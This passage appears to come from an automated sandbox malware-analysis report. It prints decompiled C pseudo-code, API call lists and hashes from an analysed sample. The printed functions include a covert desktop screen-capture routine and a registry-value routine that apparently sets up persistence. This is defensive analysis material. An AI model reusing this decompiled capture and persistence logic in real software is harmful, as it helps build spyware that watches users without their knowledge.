						_t108 =  *0x7098f58c; // 0x7837d8
						 *(_t156 + 0x18) = 0x63;
						WritePrivateProfileStringW(_t108, _t156 + 0x18, _t156 + 0x28, _t107);
						_t73 =  *0x7098f57c; // 0xa65be8
						 *((short*)(_t156 + 0x1c)) = 0x6e;
						_t128 =  *0x7098f58c; // 0x7837d8
						WritePrivateProfileStringW(_t128, _t156 + 0x18, 0, _t73);
					} else {
						_t26 = _t141 + _t141 + 2; // 0x2
						_t89 = HeapAlloc(GetProcessHeap(), 8, _t26);
						 *(_t145 + 8) = _t89;
						RtlMoveMemory(_t89, _t156 + 0x28, _t141 + _t141);
					}
					_t110 =  *0x7098f57c; // 0xa65be8
					_t129 =  *0x7098f004; // 0x1
					_t111 =  *0x7098f58c; // 0x7837d8
					 *((short*)(_t156 + 0x16)) = 0x73;
					 *(_t156 + 0x24) = _t99;
					_t77 = GetPrivateProfileIntW(_t111, _t156 + 0x18, _t129, _t110); // executed
					if(_t145 != 0) {
						 *((intOrPtr*)(_t156 + 0xe)) = 0x74;
						 *(_t145 + 0xc) = 0 | _t77 != 0x00000000;
						_t116 =  *0x7098f57c; // 0xa65be8
						_t86 =  *0x7098f58c; // 0x7837d8
						_t87 = GetPrivateProfileIntW(_t86, _t156 + 0x14, 0xc, _t116); // executed
						 *(_t145 + 0x10) = _t87;
						return _t87;
					}
					asm("sbb eax, eax");
					 *(_t156 + 0x14) =  ~(_t77 - 1) + 0x31;
					_t81 =  *0x7098f57c; // 0xa65be8
					_t82 =  *0x7098f58c; // 0x7837d8
					 *((short*)(_t156 + 0x1a)) = 0;
					 *(_t156 + 0x14) = 0x63;
					WritePrivateProfileStringW(_t82, _t156 + 0x14, _t156 + 0x18, _t81);
					_t132 =  *0x7098f57c; // 0xa65be8
					 *(_t156 + 0x18) = 0x6e;
					_t115 =  *0x7098f58c; // 0x7837d8
					return WritePrivateProfileStringW(_t115, _t156 + 0x14, 0, _t132);
				}
			}











































                                                                                                        0x70986f57
                                                                                                        0x70986f61
                                                                                                        0x70986f63
                                                                                                        0x70986f6e
                                                                                                        0x70986f7a
                                                                                                        0x70986f7a
                                                                                                        0x70986f7c
                                                                                                        0x70986f81
                                                                                                        0x70986f8d
                                                                                                        0x70986f8d
                                                                                                        0x70986f81
                                                                                                        0x70986f97
                                                                                                        0x709871d3
                                                                                                        0x70986f9d
                                                                                                        0x70986fa6
                                                                                                        0x70986fa8
                                                                                                        0x70986fb5
                                                                                                        0x70986fba
                                                                                                        0x70986fc2
                                                                                                        0x70986fca
                                                                                                        0x70986fca
                                                                                                        0x70986fce
                                                                                                        0x70986fd7
                                                                                                        0x70986fe0
                                                                                                        0x70986fe8
                                                                                                        0x70986ff0
                                                                                                        0x70986ff5
                                                                                                        0x70986ffa
                                                                                                        0x70987000
                                                                                                        0x70987004
                                                                                                        0x7098701f
                                                                                                        0x7098702a
                                                                                                        0x7098702c
                                                                                                        0x70987031
                                                                                                        0x70987036
                                                                                                        0x70987067
                                                                                                        0x7098706d
                                                                                                        0x7098707b
                                                                                                        0x70987087
                                                                                                        0x70987089
                                                                                                        0x7098709b
                                                                                                        0x709870a0
                                                                                                        0x709870a8
                                                                                                        0x70987038
                                                                                                        0x7098703b
                                                                                                        0x70987048
                                                                                                        0x70987055
                                                                                                        0x70987058
                                                                                                        0x70987063
                                                                                                        0x70987063
                                                                                                        0x709870b4
                                                                                                        0x709870b9
                                                                                                        0x709870be
                                                                                                        0x709870c3
                                                                                                        0x709870c8
                                                                                                        0x709870cc
                                                                                                        0x709870e6
                                                                                                        0x709870f1
                                                                                                        0x709870f3
                                                                                                        0x709870f8
                                                                                                        0x709870fd
                                                                                                        0x70987125
                                                                                                        0x7098712c
                                                                                                        0x7098713b
                                                                                                        0x70987147
                                                                                                        0x70987149
                                                                                                        0x7098715a
                                                                                                        0x7098715f
                                                                                                        0x70987167
                                                                                                        0x709870ff
                                                                                                        0x70987101
                                                                                                        0x7098710e
                                                                                                        0x7098711b
                                                                                                        0x7098711e
                                                                                                        0x7098711e
                                                                                                        0x70987169
                                                                                                        0x7098716f
                                                                                                        0x7098717c
                                                                                                        0x70987187
                                                                                                        0x70987193
                                                                                                        0x70987198
                                                                                                        0x7098719d
                                                                                                        0x709871a6
                                                                                                        0x709871ae
                                                                                                        0x709871b1
                                                                                                        0x709871b7
                                                                                                        0x709871c5
                                                                                                        0x709871c7
                                                                                                        0x00000000
                                                                                                        0x709871ca
                                                                                                        0x709871d9
                                                                                                        0x709871de
                                                                                                        0x709871e3
                                                                                                        0x709871e9
                                                                                                        0x709871ee
                                                                                                        0x709871fc
                                                                                                        0x70987208
                                                                                                        0x7098720a
                                                                                                        0x7098721c
                                                                                                        0x70987221
                                                                                                        0x70987234
                                                                                                        0x70987234

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 70986F73
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70986F7A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 70986F86
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70986F8D
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00A65BE8), ref: 70986FCA
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 7098701F
                                                                                                        • GetProcessHeap.KERNEL32(00000008,74B397F2), ref: 70987041
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70987048
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,74B397F0), ref: 70987058
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70987087
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00A65BE8), ref: 709870A8
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 709870E6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 70987107
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098710E
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 7098711E
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70987147
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00A65BE8), ref: 70987167
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 70987198
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 709871C5
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00A65BE8), ref: 70987208
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00A65BE8), ref: 70987229
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$String$Heap$Write$Process$AllocFreeMemoryMove
                                                                                                        • String ID: g$h$t
                                                                                                        • API String ID: 1023576463-572828210
                                                                                                        • Opcode ID: 4ed55643fcc5fb0894dcd2ddaddd71ea1fafe11db088a7a39b8c25b407844817
                                                                                                        • Instruction ID: f1f5d0a167c2568dd2a23655aba8361baa0e96aa8708cbc0f8eac945769e0e86
                                                                                                        • Opcode Fuzzy Hash: 4ed55643fcc5fb0894dcd2ddaddd71ea1fafe11db088a7a39b8c25b407844817
                                                                                                        • Instruction Fuzzy Hash: 0E8140B2528301AFD300CFA5DC64F6B73E9ABD8700F10992DB555C73D0E674E9049BA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986B70, Relevance: 34.7, APIs: 23, Instructions: 239windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 59%
                                                                                                        			E70986B70() {
				intOrPtr* _v140;
				void** _v144;
				struct tagRECT _v164;
				long _v168;
				struct HDC__* _v172;
				int _v180;
				int _v184;
				void _v188;
				int _v192;
				int _v196;
				struct tagCURSORINFO _v212;
				struct HDC__* _v216;
				intOrPtr _v224;
				intOrPtr _v228;
				struct HICON__* _v232;
				intOrPtr _v252;
				intOrPtr _v256;
				void* _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				struct HDC__* _v288;
				struct HDC__* _v304;
				long _v308;
				intOrPtr _v316;
				struct HDC__* _v320;
				intOrPtr _v324;
				struct HDC__* _t61;
				struct HDC__* _t62;
				int _t67;
				void* _t70;
				int _t75;
				void* _t82;
				intOrPtr _t91;
				int _t99;
				long _t101;
				int _t103;
				struct HWND__* _t136;
				void* _t137;
				int _t138;
				struct HDC__* _t139;
				intOrPtr _t140;
				int _t142;
				void* _t144;

				_v168 = 0;
				_t136 = GetDesktopWindow();
				_v164.left = _t136;
				_t61 = GetDC(_t136);
				_t139 = _t61;
				_v172 = _t139;
				if(_t139 != 0) {
					_t62 = CreateCompatibleDC(_t139);
					_v188 = _t62;
					if(_t62 != 0) {
						_push(0x10);
						_push( &(_v164.right));
						L7098BF02();
						GetWindowRect(_t136,  &_v164);
						_t103 = _v164.bottom;
						_t67 = _v164.right;
						_t99 = _t67;
						_t142 = _t103;
						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
						_v212.hCursor = _t137;
						if(_t137 != 0) {
							_t70 = SelectObject(_v212.flags, _t137);
							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
								_push(0x14);
								_push( &(_v212.hCursor));
								L7098BF02();
								_v212.cbSize = 0x14;
								_t75 = GetCursorInfo( &_v212);
								if(_t75 != 0 && _v212.flags == 1) {
									_push(0x14);
									_push( &_v192);
									L7098BF02();
									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
									if(_t75 != 0) {
										_push(0x18);
										_push( &_v180);
										L7098BF02();
										GetObjectW(_v192, 0x18,  &_v188);
										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
									}
								}
								__imp__#12(0, 0); // executed
								_t138 = _t75;
								if(_t138 != 0) {
									_push(_t138);
									_push(_t142);
									_push(_t99);
									_push( &_v264);
									if(E70986910() != 0) {
										_push(0x48);
										_push( &(_v164.right));
										L7098BF02();
										_push(1);
										_push( &_v164);
										_push(_t138);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
											_t101 = _v168;
											if(_t101 != 0) {
												_t82 = VirtualAlloc(0, _t101, 0x1000, 4); // executed
												_t144 = _t82;
												if(_t144 != 0) {
													_push(8);
													_push( &_v264);
													L7098BF02();
													_push(0);
													asm("xorpd xmm0, xmm0");
													asm("movlpd [esp+0x2c], xmm0");
													_push(0);
													_push(_v268);
													_push(_v272);
													_push(_t138);
													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
														L24:
														VirtualFree(_t144, 0, 0x8000);
													} else {
														_t140 = 0;
														if(_t101 == 0) {
															L23:
															_t139 = _v304;
															goto L24;
														} else {
															while(1) {
																_push( &_v308);
																_push(_t101 - _t140);
																_push(_t140 + _t144);
																_push(_t138);
																_v308 = 0;
																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
																	break;
																}
																_t91 = _v324;
																if(_t91 != 0) {
																	_t140 = _t140 + _t91;
																	if(_t140 < _t101) {
																		continue;
																	}
																}
																break;
															}
															if(_t140 == 0) {
																goto L23;
															} else {
																 *_v140 = _t140;
																_t139 = _v320;
																 *_v144 = _t144;
																_v316 = 1;
															}
														}
													}
												}
											}
										}
									}
									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138); // executed
								}
								_t137 = _v264;
							}
							DeleteObject(_t137);
						}
						DeleteDC(_v212.flags);
						_t136 = _v192;
					}
					ReleaseDC(_t136, _t139);
					return _v172;
				} else {
					return _t61;
				}
			}














































                                                                                                        0x70986b78
                                                                                                        0x70986b86
                                                                                                        0x70986b89
                                                                                                        0x70986b8d
                                                                                                        0x70986b93
                                                                                                        0x70986b95
                                                                                                        0x70986b9b
                                                                                                        0x70986ba7
                                                                                                        0x70986bad
                                                                                                        0x70986bb3
                                                                                                        0x70986bbb
                                                                                                        0x70986bc1
                                                                                                        0x70986bc2
                                                                                                        0x70986bcd
                                                                                                        0x70986bd3
                                                                                                        0x70986bd7
                                                                                                        0x70986bde
                                                                                                        0x70986be0
                                                                                                        0x70986be8
                                                                                                        0x70986bea
                                                                                                        0x70986bf0
                                                                                                        0x70986bfc
                                                                                                        0x70986c04
                                                                                                        0x70986c3c
                                                                                                        0x70986c42
                                                                                                        0x70986c43
                                                                                                        0x70986c4d
                                                                                                        0x70986c55
                                                                                                        0x70986c5d
                                                                                                        0x70986c6e
                                                                                                        0x70986c74
                                                                                                        0x70986c75
                                                                                                        0x70986c84
                                                                                                        0x70986c8c
                                                                                                        0x70986c8e
                                                                                                        0x70986c94
                                                                                                        0x70986c95
                                                                                                        0x70986ca6
                                                                                                        0x70986cea
                                                                                                        0x70986cea
                                                                                                        0x70986c8c
                                                                                                        0x70986cf4
                                                                                                        0x70986cfa
                                                                                                        0x70986cfe
                                                                                                        0x70986d04
                                                                                                        0x70986d05
                                                                                                        0x70986d0a
                                                                                                        0x70986d0b
                                                                                                        0x70986d16
                                                                                                        0x70986d1c
                                                                                                        0x70986d25
                                                                                                        0x70986d26
                                                                                                        0x70986d30
                                                                                                        0x70986d39
                                                                                                        0x70986d3a
                                                                                                        0x70986d3f
                                                                                                        0x70986d45
                                                                                                        0x70986d4e
                                                                                                        0x70986d5e
                                                                                                        0x70986d64
                                                                                                        0x70986d68
                                                                                                        0x70986d6e
                                                                                                        0x70986d74
                                                                                                        0x70986d75
                                                                                                        0x70986d7f
                                                                                                        0x70986d81
                                                                                                        0x70986d85
                                                                                                        0x70986d93
                                                                                                        0x70986d95
                                                                                                        0x70986d96
                                                                                                        0x70986d97
                                                                                                        0x70986d9c
                                                                                                        0x70986dfc
                                                                                                        0x70986e04
                                                                                                        0x70986d9e
                                                                                                        0x70986d9e
                                                                                                        0x70986da2
                                                                                                        0x70986df8
                                                                                                        0x70986df8
                                                                                                        0x00000000
                                                                                                        0x70986da4
                                                                                                        0x70986da4
                                                                                                        0x70986daa
                                                                                                        0x70986daf
                                                                                                        0x70986db6
                                                                                                        0x70986db7
                                                                                                        0x70986db8
                                                                                                        0x70986dc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986dc6
                                                                                                        0x70986dcc
                                                                                                        0x70986dce
                                                                                                        0x70986dd2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986dd2
                                                                                                        0x00000000
                                                                                                        0x70986dcc
                                                                                                        0x70986dd6
                                                                                                        0x00000000
                                                                                                        0x70986dd8
                                                                                                        0x70986de6
                                                                                                        0x70986de8
                                                                                                        0x70986dec
                                                                                                        0x70986dee
                                                                                                        0x70986dee
                                                                                                        0x70986dd6
                                                                                                        0x70986da2
                                                                                                        0x70986d9c
                                                                                                        0x70986d68
                                                                                                        0x70986d4e
                                                                                                        0x70986d3f
                                                                                                        0x70986e10
                                                                                                        0x70986e10
                                                                                                        0x70986e12
                                                                                                        0x70986e12
                                                                                                        0x70986e17
                                                                                                        0x70986e17
                                                                                                        0x70986e22
                                                                                                        0x70986e28
                                                                                                        0x70986e2d
                                                                                                        0x70986e30
                                                                                                        0x70986e42
                                                                                                        0x70986ba5
                                                                                                        0x70986ba5
                                                                                                        0x70986ba5

                                                                                                        APIs
                                                                                                        • GetDesktopWindow.USER32 ref: 70986B80
                                                                                                        • GetDC.USER32(00000000), ref: 70986B8D
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 70986BA7
                                                                                                        • RtlZeroMemory.NTDLL(?,00000010), ref: 70986BC2
                                                                                                        • GetWindowRect.USER32 ref: 70986BCD
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 70986BE2
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 70986BFC
                                                                                                        • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 70986C2E
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70986C43
                                                                                                        • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 70986C55
                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 70986C75
                                                                                                        • GetIconInfo.USER32(?,?), ref: 70986C84
                                                                                                        • RtlZeroMemory.NTDLL(?,00000018), ref: 70986C95
                                                                                                        • GetObjectW.GDI32(?,00000018,?,?,00000018,?,?,?,?,?,?,?,?,?,?,00000014), ref: 70986CA6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
                                                                                                        • String ID:
                                                                                                        • API String ID: 3821519111-0
                                                                                                        • Opcode ID: 251bee4a6f9b99f642c93a0df06c4f72a4a2349a1a7f7b3bc20956e4fdef32e4
                                                                                                        • Instruction ID: 7db3ced41128a817097a6f48cd88415abcdeb05386b0bab78c637153d034ca2e
                                                                                                        • Opcode Fuzzy Hash: 251bee4a6f9b99f642c93a0df06c4f72a4a2349a1a7f7b3bc20956e4fdef32e4
                                                                                                        • Instruction Fuzzy Hash: C6812776208302AFD310DF65CD84F6FB7B8AB88B44F10491DF6869B390DB70E8059B62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70984FD0, Relevance: 31.6, APIs: 21, Instructions: 150memoryregistrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E70984FD0(intOrPtr _a4) {
				short _v524;
				int _v528;
				int _v532;
				int _v536;
				void* _v540;
				void* _v544;
				long _t31;
				int _t36;
				long _t39;
				short* _t40;
				int _t51;
				short* _t52;
				intOrPtr _t67;
				short* _t68;
				short* _t71;
				WCHAR* _t74;
				intOrPtr _t75;
				WCHAR* _t77;
				int _t80;

				_t75 =  *0x7098f638; // 0x7488d8
				_push(StrChrW(0x7098ca5c, 0x52));
				_push(_t75);
				wsprintfW( &_v532, StrChrW(0x7098ca4c, 0x25));
				_v544 = 0;
				_t31 = RegCreateKeyExW(0x80000001,  &_v524, 0, 0, 0, 0xf023f, 0,  &_v544, 0);
				if(_t31 != 0) {
					return _t31;
				} else {
					if(_a4 == 0) {
						_v528 = 0;
						_t77 = HeapAlloc(GetProcessHeap(), 8, 0x20a);
						if(_t77 == 0) {
							L12:
							return RegCloseKey(_v544);
						}
						_t67 =  *0x7098f5e0; // 0xa42bb0
						_push(_t67);
						_t36 = wsprintfW(_t77, StrChrW(0x7098ca3c, 0x22));
						_t68 =  *0x7098f5ec; // 0xa42c0a
						_v528 = _t36;
						_v536 = 0;
						_v532 = 1;
						_t39 = RegQueryValueExW(_v540, _t68, 0,  &_v532, 0,  &_v536); // executed
						if(_t39 != 0) {
							L10:
							_t40 =  *0x7098f5ec; // 0xa42c0a
							RegSetValueExW(_v540, _t40, 0, 1, _t77, _v528 + _v528 + 2); // executed
							L11:
							HeapFree(GetProcessHeap(), 0, _t77);
							goto L12;
						}
						_t17 = _v536 + 2; // 0xa42c0c
						_t74 = HeapAlloc(GetProcessHeap(), 8, _v536 + _t17);
						if(_t74 == 0) {
							goto L10;
						}
						_t71 =  *0x7098f5ec; // 0xa42c0a
						if(RegQueryValueExW(_v540, _t71, 0,  &_v532, _t74,  &_v536) != 0) {
							L8:
							_t80 = _v524;
							L9:
							HeapFree(GetProcessHeap(), 0, _t74);
							if(_t80 != 0) {
								goto L11;
							}
							goto L10;
						}
						_t51 = lstrcmpiW(_t74, _t77);
						_t80 = 1;
						if(_t51 == 0) {
							goto L9;
						}
						goto L8;
					}
					_t52 =  *0x7098f5ec; // 0xa42c0a
					RegDeleteValueW(_v544, _t52);
					return RegCloseKey(_v544);
				}
			}






















                                                                                                        0x70984fd8
                                                                                                        0x70984fee
                                                                                                        0x70984fef
                                                                                                        0x70985005
                                                                                                        0x70985025
                                                                                                        0x70985029
                                                                                                        0x70985031
                                                                                                        0x7098517a
                                                                                                        0x70985037
                                                                                                        0x7098503e
                                                                                                        0x70985074
                                                                                                        0x70985081
                                                                                                        0x70985085
                                                                                                        0x70985165
                                                                                                        0x00000000
                                                                                                        0x7098516b
                                                                                                        0x7098508b
                                                                                                        0x70985091
                                                                                                        0x7098509d
                                                                                                        0x7098509f
                                                                                                        0x709850ae
                                                                                                        0x709850c6
                                                                                                        0x709850ce
                                                                                                        0x709850d6
                                                                                                        0x709850da
                                                                                                        0x7098513a
                                                                                                        0x7098513e
                                                                                                        0x70985153
                                                                                                        0x70985159
                                                                                                        0x7098515f
                                                                                                        0x00000000
                                                                                                        0x7098515f
                                                                                                        0x709850e0
                                                                                                        0x709850f0
                                                                                                        0x709850f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709850f6
                                                                                                        0x70985113
                                                                                                        0x70985126
                                                                                                        0x70985126
                                                                                                        0x7098512a
                                                                                                        0x70985130
                                                                                                        0x70985138
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985138
                                                                                                        0x70985117
                                                                                                        0x7098511d
                                                                                                        0x70985124
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985124
                                                                                                        0x70985040
                                                                                                        0x7098504b
                                                                                                        0x70985065
                                                                                                        0x70985065

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CA5C,00000052), ref: 70984FEC
                                                                                                        • StrChrW.SHLWAPI(7098CA4C,00000025,007488D8,00000000), ref: 70984FF7
                                                                                                        • wsprintfW.USER32 ref: 70985005
                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 70985029
                                                                                                        • RegDeleteValueW.ADVAPI32(?,00A42C0A), ref: 7098504B
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 70985056
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000020A), ref: 70985078
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098507B
                                                                                                        • StrChrW.SHLWAPI(7098CA3C,00000022,00A42BB0), ref: 70985099
                                                                                                        • wsprintfW.USER32 ref: 7098509D
                                                                                                        • RegQueryValueExW.KERNEL32 ref: 709850D6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00A42C0C), ref: 709850E7
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709850EA
                                                                                                        • RegQueryValueExW.ADVAPI32(00A42C0A,00A42C0A,00000000,?,00000000,00A42C0A), ref: 7098510F
                                                                                                        • lstrcmpiW.KERNEL32(00000000,00000000), ref: 70985117
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098512D
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70985130
                                                                                                        • RegSetValueExW.KERNEL32(00000000,00A42C0A,00000000,00000001,00000000,?), ref: 70985153
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098515C
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098515F
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 7098516B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$ProcessValue$AllocCloseFreeQuerywsprintf$CreateDeletelstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 3381264827-0
                                                                                                        • Opcode ID: 5659ed7a77ee88a988820a6e4794ac43dafeb4f4c0050aff4519d79e37e0f58b
                                                                                                        • Instruction ID: 4b14d4c376bbc026bce32c72ed1942b4510f5a24baccd87e3212d2fd343bf1ed
                                                                                                        • Opcode Fuzzy Hash: 5659ed7a77ee88a988820a6e4794ac43dafeb4f4c0050aff4519d79e37e0f58b
                                                                                                        • Instruction Fuzzy Hash: EA414CB2118304BBD210DFA1DC89FAB77ACEB88B44F10452DFA55963C0D774E909DB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00555587, Relevance: 30.6, APIs: 20, Instructions: 602fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __invoke_watson.LIBCMT ref: 005555D3
                                                                                                        • __invoke_watson.LIBCMT ref: 005555EE
                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,00000000,00000109,00000000,00000000), ref: 005557D7
                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,?,?,00000000), ref: 00555810
                                                                                                        • GetLastError.KERNEL32 ref: 00555835
                                                                                                        • __dosmaperr.LIBCMT ref: 0055583C
                                                                                                        • GetFileType.KERNEL32(?), ref: 00555851
                                                                                                        • GetLastError.KERNEL32 ref: 00555876
                                                                                                        • __dosmaperr.LIBCMT ref: 0055587F
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00555888
                                                                                                        • __chsize_nolock.LIBCMT ref: 0055596C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00555AEB
                                                                                                        • CreateFileA.KERNEL32(?,?,?,?,00000003,?,00000000), ref: 00555B08
                                                                                                        • GetLastError.KERNEL32 ref: 00555B17
                                                                                                        • __dosmaperr.LIBCMT ref: 00555B1E
                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555B51
                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555B66
                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555BD5
                                                                                                        • __lseeki64_nolock.LIBCMT ref: 00555BE6
                                                                                                        • __locking.LIBCMT ref: 00555C95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: File__lseeki64_nolock$CreateErrorLast__dosmaperr$CloseHandle__invoke_watson$Type__chsize_nolock__locking
                                                                                                        • String ID:
                                                                                                        • API String ID: 2633173609-0
                                                                                                        • Opcode ID: e6cdf83eaf1b01888120502f48ac8a4239e152c2ec65eaed5ad3c71a25af9bf2
                                                                                                        • Instruction ID: 9652718ff90b0db00d63801c5aa4fbaf9ffc5e1e948bc0f52c8ea69fe1652fba
                                                                                                        • Opcode Fuzzy Hash: e6cdf83eaf1b01888120502f48ac8a4239e152c2ec65eaed5ad3c71a25af9bf2
                                                                                                        • Instruction Fuzzy Hash: 6222F371800A4ADBDF218FA8CCB57AD7FB1FF41326F24062AE951972A1E7358D48CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709884F0, Relevance: 24.1, APIs: 16, Instructions: 139memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 54%
